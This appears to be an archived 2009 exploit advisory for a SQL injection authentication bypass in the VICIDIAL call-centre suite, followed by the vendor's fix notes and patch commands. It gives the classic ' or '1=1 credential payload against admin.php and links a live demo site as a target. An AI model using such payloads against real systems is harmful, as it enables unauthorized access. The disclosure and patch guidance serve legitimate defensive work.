VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection Vulnerability
2009-05-21 17:01:08# _ _ _ _ _ _ _ _ _ _ _ _ _____
# _ _ |_ _| | _ ) (_) | |__ | | _ ) /
#(_-< | | | |_// | | | / / |---> | |_// /
#/__/ |_| | | \\ |_| |_\_\ |_ _ | | \\ /
#########################################################################################################
[+] Type Exploit :VICIDIAL call center suite (Admin Bypass) SQL Injection Vulnerability
[+] Script Homepage :http://www.vicidial.org
[+] Discovered By Striker7
[+] Greate : His0k4 , Super Cristal , Yassine_enp , Dreadful ,Str0ke, And ALl Hacker Muslims(Dz)
[+] www.Snakespc.com
[+] Back To Hacker Of Nother Method
#########################################################################################################
[+] Exploit(Ex):
http://[Target].com/[path]/admin.php
then >>
Username: ' or '1=1
Password: ' or '1=1
[+]Live Demo:
http://www.vicidial.org/vicidial/admin.php
#########################################################################################################
#
Fixes
The vulnerability only allows access to view a list of users and campaigns, butif the exploiter tries to go into any of the detail screens they will be told
they do not have permission to view them.
This vulnerability is not present on default installations of the ViciDial Call
Center Suite, the system settings must be changed by the end user to allow for
non-latin characters in order for this vulnerability to be enabled. The quickest
way to deactivate this vulnerability is to disable non-latin characters in
ViciDial by changing the "Use Non-Latin" field in the Admin -> System Settings
screen to '0'.
The affected versions of ViciDial are the 2.0.5 release and earlier.
If you need to use non-latin characters, the following patch is available for
your systems:
http://www.eflo.net/vicidial/security_fix_admin_20090522.patch
on your system simply run these commands:
$ cd /path/from/root/to/web/vicidial
$ wget http://www.eflo.net/vicidial/security_fix_admin_20090522.patch
$ patch -p1 < ./security_fix_admin_20090522.patch
File to patch: admin.php
If you have any other questions related to this, please contact the ViciDial
Group: http://www.vicidial.com
In order to submit a new fix you need to be registered.